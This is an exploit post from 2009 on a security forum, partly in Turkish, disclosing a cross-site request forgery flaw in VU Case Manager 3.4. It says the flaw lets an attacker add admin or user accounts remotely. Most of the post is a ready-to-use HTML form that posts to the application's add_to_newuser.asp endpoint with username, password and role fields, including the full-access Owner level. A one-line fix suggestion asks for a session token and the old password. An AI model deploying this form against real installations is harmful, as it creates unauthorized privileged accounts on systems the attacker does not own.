VU Case Manager 3.4 ~ XSRF Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > VU Case Manager 3.4 ~ XSRF Vuln.

Madde
	Author : Bug Researchers/CWH1RLPOOL
	Date : 13.09.2009 19:56:55
	# VU Case Manager 3.4 ~ XSRF Vuln. [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name :VU Case Manager 3.4 # vulnerable Type : xsrf # Infection : Uzaktan otomatik olarak admin veya user eklenebilir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. # author : BUG RESEARCHERS//CWH1RLPOOL ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <form name=NEWUSER method=post action=http://localhost/casemng/add_to_newuser.asp onsubmit=return CheckForm()> <table width=575 border=0 cellspacing=0 cellpadding=5 bordercolor=white> <tr> <td width=139 bgcolor=f5f5f5> <div align=right>User Logon Name:</div></td> <td width=416> <input type=text name=username maxlength=20 size=20> </td> </tr> <tr> <td width=139 bgcolor=f5f5f5> <div align=right>User password:</div></td> <td width=416> <input type=password name=userpassword size=20 maxlength=20> </td> </tr> <tr> <td colspan=2><strong><font color=#990000 size=1 face=Verdana, Arial, Helvetica, sans-serif>select one of the following:</font></strong></td> </tr> <tr> <td width=139 bgcolor=f5f5f5> <div align=right>User Full Name:</div></td> <td width=416> <p> <input type=text name=userfullname size=30 maxlength=50> ex.: John Smith</p></td> </tr> <tr> <td bgcolor=f5f5f5> </td> <td><font size=1 face=Verdana, Arial, Helvetica, sans-serif><strong>Note: the name will always appear in the list of staff to be selected for the case assignment</strong></font></td> </tr> <tr> <td bgcolor=f5f5f5><div align=right>Assign Level:</div></td> <td> <select name=userlevel> <option value=>--select Role--</option> <option value=3>Owner</option> <option value=2>Editor</option> </select></td> </tr> <tr> <td bgcolor=f5f5f5> </td> <td><font size=1 face=Verdana, Arial, Helvetica, sans-serif><strong>Owner = full access (manager)<br> Editor = full access but limited to deletion (staff)</strong></font></td> </tr> <tr> <td width=139> <div align=left><font color=#FF0000><strong>OR</strong></font></div></td> <td width=416><font size=1 face=Verdana, Arial, Helvetica, sans-serif> </font></td> </tr> <tr> <td bgcolor=f5f5f5><div align=right>*Client Name:</div></td> <td><input type=text name=client size=40 maxlength=50> <!--onBlur=return CheckLevel();--> ex.: Microsoft Corp.</td> </tr> <tr> <td bgcolor=f5f5f5> </td> <td><font size=1 face=Verdana, Arial, Helvetica, sans-serif><strong>Note: client’s name will appear in the list of companies while entering inventory items</strong></font></td> </tr> </table> <p> <input type=submit name=Submit value=Submit> <input type=reset name=Reset value=Reset> </p> </form> < -- bug code end of -- >